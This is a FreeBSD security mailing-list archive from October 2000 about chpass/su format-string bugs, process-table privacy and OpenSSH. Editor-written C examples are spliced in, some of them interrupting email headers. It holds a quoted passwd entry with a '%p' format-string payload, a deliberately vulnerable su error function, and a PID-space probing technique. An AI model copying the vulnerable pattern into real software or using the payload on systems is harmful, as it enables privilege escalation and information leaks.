In message <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu> Tim Yardley writes:
: I would just like to point out that it was posted to bugtraq because the
: original work in progress exploit was leaked. Vendors are always notified
: once you have something that works, and caddis is no exception to this
: rule. The leak caused this bug to be posted before it was meant to be. If
: you do notice, obsd posted an advisory right after, which does show that at
: least some people were in the "know".

We had rumblings of this on the SO list at about 3pm or so yesterday, but that was from the OpenBSD folks wanting to know what versions were vulnerable.

Warner

From owner-freebsd-security Wed Oct 4 10:31:53 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4549737B502 for ; Wed, 4 Oct 2000 10:31:49 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HVlM16365; Wed, 4 Oct 2000 11:31:48 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37754; Wed, 4 Oct 2000 11:31:47 -0600 (MDT)
Message-Id: <200010041731.LAA37754@harmony.village.org>
To: Mike Silbersack
Subject: Re: OpenBSD Security Advisory (fwd)
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 04 Oct 2000 12:16:02 CDT."
References:
Date: Wed, 04 Oct 2000 11:31:47 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Mike Silbersack writes:
: Are we patched?

Yes. It doesn't look like we were ever vulnerable for fstat. From the little poking around I did with annotate, I think we've been safe from the outset, at least since 1997 with charnier's warn*/err* cleanups. Unless this is something subtle that I'm missing.

We really need someone to go through the format fixes and back port them to 3.x and 2.x. Volunteers?

Warner

From owner-freebsd-security Wed Oct 4 10:32:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3F65837B503 for ; Wed, 4 Oct 2000 10:32:46 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HWhM16374; Wed, 4 Oct 2000 11:32:43 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37782; Wed, 4 Oct 2000 11:32:43 -0600 (MDT)
Message-Id: <200010041732.LAA37782@harmony.village.org>
To: "John"
Subject: Re: Fwd: BSD chpass
Cc: "Mike Tancsa" , freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Wed, 04 Oct 2000 13:15:55 EDT." <008001c02e26$c20c6100$03030303@dns>
References: <008001c02e26$c20c6100$03030303@dns> <4.2.2.20001004011210.035225e0@mail.sentex.net> <200010041719.LAA37604@harmony.village.org>
Date: Wed, 04 Oct 2000 11:32:43 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <008001c02e26$c20c6100$03030303@dns> "John" writes:
: chmod a-s /usr/bin/chpass
: or chmod 700 /usr/bin/chpass
:
: Solution or not? I believe that will work out just fine.

Workaround. It will protect you from the exploit, but much functionality that these commands provide will be lost.

Warner

From owner-freebsd-security Wed Oct 4 10:34:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 76ACF37B502; Wed, 4 Oct 2000 10:34:24 -0700 (PDT)
Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id NAA257924; Wed, 4 Oct 2000 13:34:20 -0400
Mime-Version: 1.0
X-Sender: drosih@mail.rpi.edu
Message-Id:
In-Reply-To: <20001004032836.B98174@freefall.freebsd.org>
References: <200009300023.e8U0NUW20137@earth.backplane.com> <20001004032836.B98174@freefall.freebsd.org>
Date: Wed, 4 Oct 2000 13:34:18 -0400
To: Kris Kennaway , Matt Dillon
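The chmod workaround in the exchange above, worked through as an added example; this is editor-written code, not anything from the thread or the FreeBSD tree. It assumes, as on FreeBSD, that chfn(1), chsh(1) and the yp* variants are hard links to the same inode as /usr/bin/chpass (check with `ls -li /usr/bin/ch*`): the set-user-ID bit is inode state, so `chmod a-s` on any one name clears it for all of them, which is why Warner says several commands lose functionality. Rather than touch /usr/bin, the demo builds a setuid file and a hard link to it in a scratch directory and shows the bit disappearing from the second name when the first is chmod'ed. Function names are the example's own.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* mkdtemp() */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Report whether `path` is set-user-ID and how many directory entries share
 * its inode.  Returns 0 on success, -1 if the path cannot be stat'ed. */
int setuid_status(const char *path, int *is_setuid, unsigned long *nlink)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    *is_setuid = (st.st_mode & S_ISUID) != 0;
    *nlink = (unsigned long)st.st_nlink;
    return 0;
}

/* John's workaround, `chmod a-s path`: clear set-user-ID and set-group-ID,
 * keep everything else.  The bits live in the inode, so every hard link to
 * the file loses them at once.  Returns 0 on success. */
int strip_setid(const char *path)
{
    struct stat st;
    mode_t keep;

    if (stat(path, &st) != 0)
        return -1;
    keep = st.st_mode & (S_ISVTX | S_IRWXU | S_IRWXG | S_IRWXO);
    return chmod(path, keep);
}

/* Build the scenario in a scratch directory: a setuid "chpass" plus a hard
 * link "chfn" to the same inode, the shape the chpass family has on FreeBSD
 * (assumption, see the lead-in).  Any owner may set the bit on their own
 * file; it only has teeth on root's files, but that is enough to show the
 * link behaviour.  Returns 0 on success and fills in both paths. */
int make_linked_setuid_pair(char *chpass, size_t chpass_len,
                            char *chfn, size_t chfn_len)
{
    const char *base = getenv("TMPDIR");
    char dir[256];
    int fd;

    if (base == NULL)
        base = "/tmp";
    snprintf(dir, sizeof dir, "%s/chpass-demo.XXXXXX", base);
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(chpass, chpass_len, "%s/chpass", dir);
    snprintf(chfn, chfn_len, "%s/chfn", dir);

    fd = open(chpass, O_WRONLY | O_CREAT | O_EXCL, 0755);
    if (fd < 0)
        return -1;
    close(fd);
    /* mode 4755, what a setuid system binary normally carries */
    if (chmod(chpass, S_ISUID | S_IRWXU | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH) != 0)
        return -1;
    return link(chpass, chfn);
}

int main(void)
{
    char chpass[256], chfn[256];
    int suid;
    unsigned long links;

    if (make_linked_setuid_pair(chpass, sizeof chpass, chfn, sizeof chfn) != 0) {
        perror("setup");
        return 1;
    }
    setuid_status(chfn, &suid, &links);
    printf("before: %s setuid=%d links=%lu\n", chfn, suid, links);
    strip_setid(chpass);                       /* chmod a-s on the OTHER name */
    setuid_status(chfn, &suid, &links);
    printf("after chmod a-s %s: %s setuid=%d links=%lu\n", chpass, chfn, suid, links);
    return 0;
}
```

The two workarounds John lists are not equivalent: `chmod a-s` leaves the program runnable but, for anyone but root, unable to write the password database, while `chmod 700` makes it unrunnable by ordinary users outright. Either way, with the link layout assumed above, the change reaches every name on the inode, so check `ls -li` before and after rather than assuming only chpass was affected.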
From: Garance A Drosihn
Subject: Re: Proposed minor mod to openssh for interactive operation
Cc: freebsd-security@FreeBSD.ORG
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 3:28 AM -0700 10/4/00, Kris Kennaway wrote:
>On Fri, Sep 29, 2000 at 05:23:30PM -0700, Matt Dillon wrote:
>
> > I have trivial patches (two minor tests), any objections to
> > my committing them? Also, I'm not sure whether we are trying
> > to keep our openssh synced with openbsd's. Does anyone know
> > the procedure for making changes to openssh in FreeBSD's CVS tree?
>
>You should contribute these patches back to the OpenSSH developers
>first - see www.openssh.com for contact details. I don't like making
>changes to our version of openssh unless we have to, since it makes my
>job harder managing the divergences when I import a new version. If
>you really can't get them to accept the patches, then let me know..

I would also like to plead that we try and keep openssh on freebsd as close to the "official" one as possible. Here at RPI, I ssh between systems running freebsd, openbsd, MacOS 10pb, AIX, Solaris, IRIX, and even a nextstation or two. Adding features that only appear on one platform is pretty useless to me. Adding them to the "official portable openssh" is much more useful.

Note that the "portable openssh" is different than the openssh which openbsd comes with, so we aren't trying to keep in sync with openbsd per se.
---
Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu
Senior Systems Programmer or drosih@rpi.edu
Rensselaer Polytechnic Institute

From owner-freebsd-security Wed Oct 4 10:49:55 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 82F9237B502 for ; Wed, 4 Oct 2000 10:49:49 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HnlM16501; Wed, 4 Oct 2000 11:49:48 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA38070; Wed, 4 Oct 2000 11:49:47 -0600 (MDT)
Message-Id: <200010041749.LAA38070@harmony.village.org>
To: K2
Subject: Re: OpenBSD Security Advisory
Cc: security@freebsd.org
In-reply-to: Your message of "Wed, 04 Oct 2000 00:31:03 PDT." <39DADCB7.4E416D8B@ktwo.ca>
References: <39DADCB7.4E416D8B@ktwo.ca>
Date: Wed, 04 Oct 2000 11:49:47 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've had two requests from users to go through this and report on FreeBSD's status. I answered the fstat's portion in earlier mail, so I'll just say we aren't vulnerable and haven't been for a long long time. Since we're not vulnerable to any of these, I have a problem posting that to bugtraq as those sorts of messages tend to create a lot of clutter and ill will.

In message <39DADCB7.4E416D8B@ktwo.ca> K2 writes:
: There is also su, although it is only exploitable by the
: usershell=format string, there is a possibility that somebody has a
: third party application set the user shell to something that may be
: malicious. Why no even passing mention in their "Daily Changelog" or
: their security pages?
:
: ---- SNIP -- SNIP ----
: rain:/usr/src/libexec/talkd# su - ktwo
: su: /usr/local/bin/bash0x00x1b150xdfbfdc8c0xdfbfdc280xdfbfdc2c: No such
: file or directory
: rain:/usr/src/libexec/talkd# cat /etc/passwd|grep ktwo
: ktwo:*:100:100:what's your
: style,,,:/home/ktwo:/usr/local/bin/bash%p%p%p%p%p

FreeBSD has been immune to this attack for a long time (since at least 1994, maybe earlier):

1.1 (rgrimes 27-May-94): err(1, "%s", shell);

: talkd, A DEFAULT service.

FreeBSD has never had this hole, as far as I can tell. We don't use fprintf here, but instead we build an iovec list up.

: WOW what about photurisd?

We don't have photurisd.

Warner

From owner-freebsd-security Wed Oct 4 11:04:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 2091C37B502 for ; Wed, 4 Oct 2000 11:04:37 -0700 (PDT)
Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 87A6B1C7B; Wed, 4 Oct 2000 14:04:36 -0400 (EDT)
Date: Wed, 4 Oct 2000 14:04:36 -0400
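The su(1) bug K2 demonstrates, and the one-line fix Warner quotes, recast as an added example (editor-written; not the thread's code and not any BSD's su). su looked up the login shell from the passwd entry and, when exec of it failed, passed that string to err(3) as the format; a shell field ending in `%p%p%p%p%p` therefore made err() walk the stack, which is the hex soup in K2's transcript. FreeBSD's `err(1, "%s", shell)` passes the shell as an argument to a constant format. err() prints and exits, so the two calling patterns are shown through a stand-in with the same variadic signature that formats into a buffer instead; the vulnerable path is exercised only with `%%`, a defined conversion, to show the interpretation without the undefined behaviour a real `%p` or `%n` would cause.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for err(3): formats "su: <message>: <reason>" into `out` instead
 * of printing to stderr and exiting.  The variadic signature is what lets
 * the caller's mistake compile without complaint, exactly as with err(). */
static int su_err(char *out, size_t outlen, const char *fmt, ...)
{
    char body[256];
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(body, sizeof body, fmt, ap);   /* the format engine runs here */
    va_end(ap);
    return snprintf(out, outlen, "su: %s: No such file or directory", body);
}

/* The bug: the login shell from the passwd entry IS the format string.
 * Called below only with "%%" (a defined conversion); a real "%p%p%p" or
 * "%n" here is undefined behaviour and the attacker's foothold. */
int render_shell_error_vuln(const char *shell, char *out, size_t outlen)
{
    return su_err(out, outlen, shell);
}

/* The fix FreeBSD has carried since 1994: constant format, shell as data. */
int render_shell_error_safe(const char *shell, char *out, size_t outlen)
{
    return su_err(out, outlen, "%s", shell);
}

/* Audit helper: count conversions in an untrusted field ("%%" is literal).
 * A login shell or GECOS field containing any deserves a look on a system
 * that still ships the vulnerable pattern. */
int count_conversions(const char *s)
{
    int n = 0;

    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent, not a conversion */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    const char *shell = "/usr/local/bin/bash%%";
    char out[512];

    render_shell_error_vuln(shell, out, sizeof out);
    printf("vulnerable: %s\n", out);      /* the %% collapses to a single % */
    render_shell_error_safe(shell, out, sizeof out);
    printf("fixed:      %s\n", out);      /* the shell string is left alone */
    printf("conversions in K2's shell field: %d\n",
           count_conversions("/usr/local/bin/bash%p%p%p%p%p"));
    return 0;
}
```

The same shape recurs wherever attacker-influenced text reaches a printf-family, syslog(3) or err(3) call as the first argument; the audit is mechanical (grep for those calls whose format is not a string literal), which is what the tree-wide sweeps Warner mentions did.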
From: Bill Fumerola
To: "Jacques A. Vidrine"
Cc: cjclark@alum.mit.edu, freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
Message-ID: <20001004140436.K38472@jade.chc-chimes.com>
References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <20001004114308.B23379@hamlet.nectar.com>; from n@nectar.com on Wed, Oct 04, 2000 at 11:43:08AM -0500
X-Operating-System: FreeBSD 3.3-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 11:43:08AM -0500, Jacques A. Vidrine wrote:
> On Wed, Oct 04, 2000 at 08:47:29AM -0700, Crist J . Clark wrote:
> > This was posted to BugTraq yesterday. It is a series of patches to
> > restrict certain information from non-priv'ed users.
>
> man jail

also, see kern.ps_showallprocs. I sent a letter to bugtraq regarding kern.ps_showallprocs, but evidently approving posts of exploits that haven't been sent to the vendor takes up too much time and approving my post isn't a priority.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From owner-freebsd-security Wed Oct 4 11:06:39 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 709BD37B503 for ; Wed, 4 Oct 2000 11:06:36 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id OAA08137; Wed, 4 Oct 2000 14:06:11 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Wed, 4 Oct 2000 14:06:11 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: cjclark@alum.mit.edu
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
In-Reply-To: <20001004084729.C25121@149.211.6.64.reflexcom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Oct 2000, Crist J . Clark wrote:

> Restricted kernel process table and proc filesystem
> *---------------------------------------------------*
>
> This patch gives limited access for non-root to process table, only root
> sees all processes and has access to their entries in proc filesystem.
> Permission to directories in proc filesystem is changed
> to 550 (dr-xr-x---). Non-root users can only see own processes.

A feature very like this is present in 5.0-CURRENT, only /proc actually limits what processes can see there. Also, linprocfs is protected. You can set that feature using "sysctl -w kern.ps_showallprocs=0" with privilege. This feature was originally introduced by Paul Saab, I believe, but its incarnation in 4.x-STABLE isn't very complete, and doesn't protect /proc and linprocfs. My structural changes in inter-process authorization in the -CURRENT branch included the procfs fixes. Note that although this does protect /proc from listing processes that are owned by other users, it is still possible to walk the PID space using fork()/getpid() to identify in-use PIDs.

I have not looked at backporting the inter-process authorization changes to -STABLE, as they're part of a larger structural improvement slated for inclusion in 5.0-CURRENT. However, they probably can be usefully isolated and MFC'd if the feature is desirable.

> Restricted who/w/last
> *---------------------------------------------------*
>
> Restricted who/w/last gives limited access to utmp/wtmp entries.
> Users can see only own login to system (no group like w_all, w_grp),
> but if user is added to group w_grp can see own and group login.
> Group w_all is for trusted users that have full read access to utmp/wtmp.

Unless you make who/w/last privileged in some way and restrict access to utmp/wtmp based on that privilege (setgid or the like), these will only be advisory protections. I.e., changes only to the binaries offer no real protection. Requiring privilege for access to utmp may break many things. That's not to say this can't be done, just that it's a bit more complicated than adding permission checks to the tools themselves.

It might be interesting, at some point, to move to keeping utmp-like information in kernel and accessing it via a MIB, rather than using a file: processes would be allowed to change certain entries based on access to the pty in question, but existing privileged calls would be required to set login names, etc. Wtmp has to remain a file for the obvious reasons.

Robert N M Watson
robert@fledge.watson.org      http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Wed Oct 4 11:15:10 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 173F737B503 for ; Wed, 4 Oct 2000 11:15:09 -0700 (PDT)
Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 4A97419265; Wed, 4 Oct 2000 13:15:08 -0500 (CDT)
Received: (from nectar@localhost) by hamlet.nectar.com (8.9.3/8.9.3) id NAA54455; Wed, 4 Oct 2000 13:15:08 -0500 (CDT) (envelope-from nectar@spawn.nectar.com)
Date: Wed, 4 Oct 2000 13:15:08 -0500
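Robert's caveat about walking the PID space, as an added example (editor-written; not from the thread or the patches it discusses). It assumes the kernel hands out PIDs sequentially, as FreeBSD of that era and Linux today do: fork repeatedly, note the PID each child receives, and any number skipped between two consecutive children was occupied at that instant, whether or not ps(1) or /proc would show its owner. Hiding the process table therefore keeps names, arguments and owners private, not the fact that processes exist. On Linux, thread creation also draws from the same ID space, so a gap means "some task was created or is alive", not strictly "a process". Randomised PID allocation (FreeBSD's kern.randompid sysctl, which the thread does not mention) is the counter to this inference.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork `rounds` children that exit immediately and record the PIDs skipped
 * between consecutive children; each skipped number had been handed to some
 * other task at that moment.  Skipped PIDs go into `inuse` (at most `max`)
 * and *ninuse receives how many were found.  Returns the number of children
 * observed, or -1 if fork() fails. */
int probe_pid_gaps(int rounds, pid_t *inuse, size_t max, size_t *ninuse)
{
    pid_t prev = -1;
    int observed = 0;

    *ninuse = 0;
    for (int i = 0; i < rounds; i++) {
        pid_t child = fork();
        if (child < 0)
            return -1;
        if (child == 0)
            _exit(0);                 /* the child's only job was to be numbered */
        waitpid(child, NULL, 0);
        observed++;
        /* A backwards jump means the PID space wrapped; skip that round. */
        if (prev >= 0 && child > prev + 1)
            for (pid_t p = prev + 1; p < child; p++)
                if (*ninuse < max)
                    inuse[(*ninuse)++] = p;
        prev = child;
    }
    return observed;
}

int main(void)
{
    pid_t inuse[128];
    size_t n = 0;
    int seen = probe_pid_gaps(16, inuse, 128, &n);

    if (seen < 0) {
        perror("fork");
        return 1;
    }
    printf("%d children forked; %zu PID(s) skipped, i.e. held by something else:",
           seen, n);
    for (size_t i = 0; i < n; i++)
        printf(" %ld", (long)inuse[i]);
    printf("\n");
    return 0;
}
```

Run it on a box with kern.ps_showallprocs=0 (or any kernel that hides other users' processes) and compare the skipped list with what `ps ax` shows the unprivileged user: the PIDs are visible either way, only the details are not.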
From: "Jacques A. Vidrine"
To: Bill Fumerola
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
Message-ID: <20001004131508.A54413@hamlet.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" , Bill Fumerola , freebsd-security@freebsd.org
References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com> <20001004140436.K38472@jade.chc-chimes.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20001004140436.K38472@jade.chc-chimes.com>; from billf@chimesnet.com on Wed, Oct 04, 2000 at 02:04:36PM -0400
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 02:04:36PM -0400, Bill Fumerola wrote:
> also, see kern.ps_showallprocs.

Nifty, I missed that one. We need a man page with this kind of stuff.

--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Wed Oct 4 11:27:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6E17237B66D for ; Wed, 4 Oct 2000 11:27:31 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id OAA08418; Wed, 4 Oct 2000 14:27:25 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Wed, 4 Oct 2000 14:27:25 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: cjclark@alum.mit.edu
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
In-Reply-To: <20001004084729.C25121@149.211.6.64.reflexcom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Check permission to who/w/last (need sgid uwtmp group) and reboot your
> system.

newsyslog.conf must be updated for this to remain in effect more than a month; after that, newsyslog will rotate the wtmp log and chmod it to be world readable:

/var/log/wtmp 644 3 * @01T05 B

Similarly, utmp will be chmod'd each boot as part of clean_var() in /etc/rc:

/etc/rc: (cd /var/run && cp /dev/null utmp && chmod 644 utmp;)

I haven't read the patches so can't comment on their correctness.

Robert N M Watson
robert@fledge.watson.org      http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Wed Oct 4 11:44:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 4F2E337B502 for ; Wed, 4 Oct 2000 11:44:32 -0700 (PDT)
Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id OAA18194 for ; Wed, 4 Oct 2000 14:44:27 -0400 (EDT)
Date: Wed, 4 Oct 2000 14:44:27 -0400 (EDT)
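The newsyslog(8) detail Robert points out, turned into a check, as an added example (editor-written, not from the thread or the patch set). A hand-applied chmod on /var/log/wtmp holds only until the next rotation, because newsyslog recreates the file with the mode in the second column of its entry (the third if an owner:group column is present). The parser below pulls that column out of newsyslog.conf text and flags entries that hand the file back to "other". The sample configuration is constructed for the demo, with only the wtmp line taken from the message above; the hardened line's root:wheel owner is a placeholder for whatever group the restricted who/w/last tools would carry. The clean_var() chmod of utmp at boot is the same problem in /etc/rc and has to be fixed there; this example does not parse shell.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample newsyslog.conf; only the /var/log/wtmp line is the one
 * quoted in the thread. */
static const char SAMPLE_CONF[] =
    "# logfilename          [owner:group]  mode count size when   flags\n"
    "/var/log/messages                     644  5     100  *      Z\n"
    "/var/log/wtmp 644 3 * @01T05 B\n"
    "/var/log/auth.log      root:wheel     600  7     100  *      Z\n";

/* The same entry after tightening: an owner:group column and no 'other' bits.
 * root:wheel is a placeholder for the group the who/w/last tools run as. */
static const char HARDENED_CONF[] =
    "/var/log/messages                     644  5     100  *      Z\n"
    "/var/log/wtmp          root:wheel     640  3     *    @01T05 B\n";

/* Return the mode newsyslog will apply to `logfile` when it rotates it (as
 * an octal value), or -1 if the file has no entry.  Columns are
 *   logfilename [owner:group] mode count size when flags ...
 * and, like newsyslog itself, an owner column is recognised by the ':' or
 * '.' separating owner from group. */
long newsyslog_mode(const char *conf, const char *logfile)
{
    const char *p = conf;

    while (*p != '\0') {
        char line[512], c1[128], c2[128], c3[128];
        size_t len = strcspn(p, "\n");
        const char *mode;
        int n;

        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += len;
        if (*p == '\n')
            p++;

        n = sscanf(line, "%127s %127s %127s", c1, c2, c3);
        if (n < 2 || c1[0] == '#' || strcmp(c1, logfile) != 0)
            continue;                 /* blank, comment, or another file */
        mode = c2;
        if (strchr(c2, ':') != NULL || strchr(c2, '.') != NULL) {
            if (n < 3)
                return -1;            /* owner given but no mode: malformed */
            mode = c3;
        }
        return strtol(mode, NULL, 8);
    }
    return -1;
}

/* 1 if the mode grants 'other' any of r/w/x, 0 otherwise (or if no entry). */
int mode_world_accessible(long mode)
{
    return mode >= 0 && (mode & 07) != 0;
}

int main(void)
{
    const char *logs[] = { "/var/log/wtmp", "/var/log/auth.log" };

    for (size_t i = 0; i < sizeof logs / sizeof logs[0]; i++) {
        long m = newsyslog_mode(SAMPLE_CONF, logs[i]);
        printf("%-18s mode after rotation: %04lo%s\n", logs[i], m,
               mode_world_accessible(m) ? "   <- world readable again" : "");
    }
    printf("%-18s hardened entry:      %04lo\n", "/var/log/wtmp",
           newsyslog_mode(HARDENED_CONF, "/var/log/wtmp"));
    return 0;
}
```

Feed it the real /etc/newsyslog.conf and check every log that the restricted tools are supposed to guard, not just wtmp; a mode column is easy to overlook in a file that is mostly about rotation schedules.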
From:
To: freebsd-security@freebsd.org
Subject: OSSH and NetBSD's "OSSH" ?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Since we're trying to keep in sync with OpenSSH as the goal, has anyone given thought if we will maintain compatibility with NetBSD's "OpenSSH" replacement?

I think their decision to do their own implementation is just daft. But I am curious as to how this will affect things. I am guessing we will just sync with OSSH and if NetBSD's version happens to be compat, fine; if not, too bad, so sad. This whole thing really annoys me. But I am curious about others' thoughts.

=============================================================================
-Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek
Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas
Home: scanner@deceptively.shady.org | http://open-systems.net
=============================================================================
WINDOWS: "Where do you want to go today?"
LINUX: "Where do you want to go tomorrow?"
BSD: "Are you guys coming or what?"
=============================================================================

From owner-freebsd-security Wed Oct 4 11:46:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from beta.root-servers.ch (beta.root-servers.ch [195.49.33.19]) by hub.freebsd.org (Postfix) with SMTP id 2BDEB37B502 for ; Wed, 4 Oct 2000 11:46:34 -0700 (PDT)
Received: (qmail 18164 invoked from network); 4 Oct 2000 18:46:24 -0000
Received: from client75-185.hispeed.ch (HELO WORK) (62.2.75.185) by beta.root-servers.ch with SMTP; 4 Oct 2000 18:46:24 -0000
Date: Wed, 4 Oct 2000 20:49:42 +0200
From: Gabriel Ambuehl
X-Mailer: The Bat! (v1.46c) UNREG / CD5BF9353B3B7091
Organization: BUZ Internet Services
X-Priority: 3 (Normal)
Message-ID: <12917380571.20001004204942@buz.ch>
To: Dima Dorfman
Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack ,
Subject: Re[2]: BSD chpass (fwd)
In-reply-To: <20001004100859.33A4A1F0A@static.unixfreak.org>
References: <20001004100859.33A4A1F0A@static.unixfreak.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello Dima,

Wednesday, October 04, 2000, 12:08:59 PM, you wrote:
> of the script kid population). A really clever attacker would modify
> your securelevel settings in rc.conf, reboot the machine making it
> look like a panic or power surge

What about setting schg for it as well? You'd just need to find a way to change it yourself (not sure about it, but it should be changeable in single user mode which is fortunately only controllable by the console).

Best regards,
Gabriel

From owner-freebsd-security Wed Oct 4 11:47:23 2000
Delivered-To: freebsd-security@freebsd.org
